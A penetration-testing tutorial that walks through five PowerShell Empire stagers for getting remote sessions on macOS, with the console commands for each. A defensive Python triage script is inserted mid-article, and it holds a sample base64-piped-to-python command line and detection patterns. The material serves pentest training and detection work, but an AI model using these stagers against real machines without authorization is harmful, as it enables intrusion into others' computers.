
Multiple Ways to Exploit OSX using PowerShell Empire

In this article, we will learn multiple ways to exploit OSX with PowerShell Empire. Empire provides several stagers for this purpose, and we will cover a few of them here. The method of attacking OSX is similar to that for Windows, which makes Empire a versatile tool for penetration testers. For a beginner’s guide to pen-testing OSX, click here.

Table of Contents

  • osx/macho
  • osx/applescript
  • osx/launcher
  • osx/jar
  • osx/safari_launcher

osx/macho

The first stager we will use is osx/macho. This stager creates a Mach-O file, the native executable format for binaries on OS X. The format was designed specifically for OS X and tells the system in what order to read code and data into memory when the binary is loaded. That makes this stager quite useful when it comes to attacking OS X.

Listener creation is the same as for Windows; use the HTTP listener. Once the listener is created, execute the following set of commands:

usestager osx/macho
set Listener http
set OutFile shell.macho
execute

Once shell.macho is executed on the victim’s machine, you will have your session, as shown in the image below:

Exploiting OSX with PowerShell Empire

osx/applescript

The next stager we will use is osx/applescript. This stager generates AppleScript code. AppleScript is the dedicated scripting language of the Mac and gives automated control over scriptable Mac applications, which makes this an important stager for pen-testing a Mac. To create the malicious AppleScript, run the following set of commands:

usestager osx/applescript
set Listener http
execute

Executing the above stager produces the code; run this code on the target system, as shown in the following image:

Exploiting OSX with PowerShell Empire

As soon as the code is executed on the victim’s machine, you will have your session, as shown in the image:

osx/launcher

The next stager we will use is osx/launcher. This is the most commonly used stager. To execute it, run the following commands:

usestager osx/launcher
execute

Copy the generated code and run it in the target system’s shell. As soon as the code is executed, you will have your session, as shown in the image below:

Exploiting OSX with PowerShell Empire

osx/jar

The next stager we will use is osx/jar. This stager creates a .jar file, a Java archive that packages compressed Java class files so that the Java runtime can run them directly. This stager turns out to be a suitable one when it comes to attacking OS X. Use the following set of commands to execute it:

usestager osx/jar
set Listener http
set OutFile out.jar
execute

The stager will create the jar file described above; once the attacker executes that file on the victim’s system, you will have your session, as shown in the image:

osx/safari_launcher

The last stager we will use is osx/safari_launcher, which generates an HTML launcher page for Safari. For this stager, run the following set of commands:

usestager osx/safari_launcher
set Listener http
execute

Open the generated code in Safari on the victim’s machine and you will have your session, as shown in the image below:

Exploiting OSX with PowerShell Empire
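From the defender's side, each of the five stagers above depends on a distinct launch pattern on the target: a dropped binary run from a user-writable path (macho), osascript execution (applescript), a base64-decoded shell one-liner piped into an interpreter (launcher), a .jar started from a user-writable path (jar), and an interpreter spawned by Safari (safari_launcher). The following is an added example, not code from the article or the Empire project, that triages constructed macOS process-execution records for these patterns; the record format, directory list and regexes are assumptions for illustration, not Empire's actual stager output.

```python
import re

# Assumed record format: (parent process name, full command line). The
# sample records below are constructed for this example.
SAMPLE_EVENTS = [
    ("Terminal", "/Users/alice/Downloads/shell.macho"),
    ("Finder", "osascript /tmp/run.scpt"),
    ("bash", "echo aW1wb3J0IHN5cw== | base64 -D | python"),
    ("java", "java -jar /Users/alice/Downloads/out.jar"),
    ("Safari", "osascript -e 'do shell script \"python -c ...\"'"),
    ("Terminal", "ls -la /Users/alice"),
]

# Assumed lists: common interpreters and directories an unprivileged user can write to.
INTERPRETERS = ("python", "sh", "bash", "zsh", "perl", "osascript", "java")
USER_WRITABLE = ("/Users/", "/tmp/", "/private/tmp/", "/var/folders/")

# Heuristic regexes (assumptions): base64 decode piped into an interpreter,
# and a jar launched via `java -jar <path>`.
BASE64_PIPE = re.compile(r"base64\s+(-D|-d|--decode)\b.*\|\s*(python|sh|bash|zsh|perl)\b")
JAR_RUN = re.compile(r"\bjava\b.*\s-jar\s+(\S+)")


def classify(parent, cmd):
    """Return the list of hints that apply to one process-execution record."""
    hints = []
    tokens = cmd.split()
    exe = tokens[0] if tokens else ""
    base = exe.rsplit("/", 1)[-1]
    # A stand-alone binary (e.g. a dropped Mach-O) launched from a user-writable path.
    if exe.startswith(USER_WRITABLE) and base not in INTERPRETERS:
        hints.append("binary-from-user-writable-path")
    if base == "osascript":
        hints.append("applescript-execution")
    if BASE64_PIPE.search(cmd):
        hints.append("base64-decoded-one-liner")
    jar = JAR_RUN.search(cmd)
    if jar and jar.group(1).startswith(USER_WRITABLE):
        hints.append("jar-from-user-writable-path")
    # A browser should not normally be the parent of a shell or script interpreter.
    if parent == "Safari" and base in INTERPRETERS:
        hints.append("browser-spawned-interpreter")
    return hints


def triage(events):
    """Return [(command line, hints)] for every record that triggers at least one hint."""
    return [(cmd, classify(parent, cmd)) for parent, cmd in events if classify(parent, cmd)]
```

Run over the constructed records, five of the six are flagged and only the plain `ls` passes; in practice the record source would be an EDR or Endpoint Security process-exec feed rather than an inline list.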

To learn more about PowerShell, follow this link.

So, these were five ways to attack or pentest OS X. They are pretty easy and convenient, and each of them is valid and up to date.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | and Researcher. Contact Here